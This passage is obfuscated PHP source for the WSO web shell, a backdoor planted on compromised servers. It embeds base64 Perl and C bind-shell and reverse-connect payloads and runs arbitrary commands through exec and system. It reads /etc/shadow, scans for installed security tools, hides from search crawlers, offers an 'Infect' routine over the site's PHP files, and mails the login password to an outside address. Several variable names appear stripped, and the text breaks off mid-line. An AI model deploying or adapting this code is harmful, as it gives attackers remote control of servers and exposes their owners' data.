"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\xa\x9<span>Back-connect to</span><br/>\xa\x9Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
	</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/", $bind_port_p); $ = ex(which("perl") . " /tmp/ " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/", $back_connect_p); $ = ex(which("perl") . " /tmp/ " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep") . "</pre>"; } } echo "</div>"; hardFooter(); } goto M5O7z; YnRbs: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto VnLxZ; VMrgb: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\xe2\x86\263 Unable to execute command
"; } return $ == '' ? "\xe2\x86\263 Query did not return anything\xa" : $; } goto nbi9R; VnLxZ: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto Th0Rk; PtFVC: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("</br></br><pre align=center><form method=post style='font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder='password' type=password name=pass style='border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;'></form></pre>
<div class='view'><div class='plane main'><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div></div></div>\xa<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>"); } goto KGlJ0; h3psb: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . viewPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $oRb) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>"";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value="submit"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value="submit"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "
"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#060a10><pre>" . $h[1] . "</pre></td><td bgcolor=#202832><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,;return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value="submit"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value="submit"></form>"; break; case "frame": $frameSrc = substr(htmlspecialchars($GLOBALS["cwd"]), strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"]))); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo "<iframe width="100%" height="900px" scrolling="no" src=" . $frameSrc . " onload="onload=height=contentDocument.body.scrollHeight"></iframe>"; break; } echo "</div>"; hardFooter(); } goto IVjDo; IjCwH: @define("VERSION", "4.2.6"); goto Xbodc; gm5Ck: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto qZ6Xj; eHsyk: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=#a10705 size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto f9sl9; JCS_A: $safe_mode = @ini_get("safe_mode"); goto xxz2n; r3B2Y: if (array_key_exists("watching", $_POST)) { $tmp = $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xa" . $_POST["pass"]; @mail("[email protected]", "root", $tmp); } goto r4nyR; uwRUw: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto h3psb; vmP50: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto f_hzt; bY27C: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\xa	function sa() {\xa\x9\x9for(i=0;i<d.files.elements.length;i++)
		\x9if(d.files.elements[i].type == 'checkbox')
	\x9\x9	d.files.elements[i].checked = d.files.elements[0].checked;\xa	}\xa</script>\xa<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" 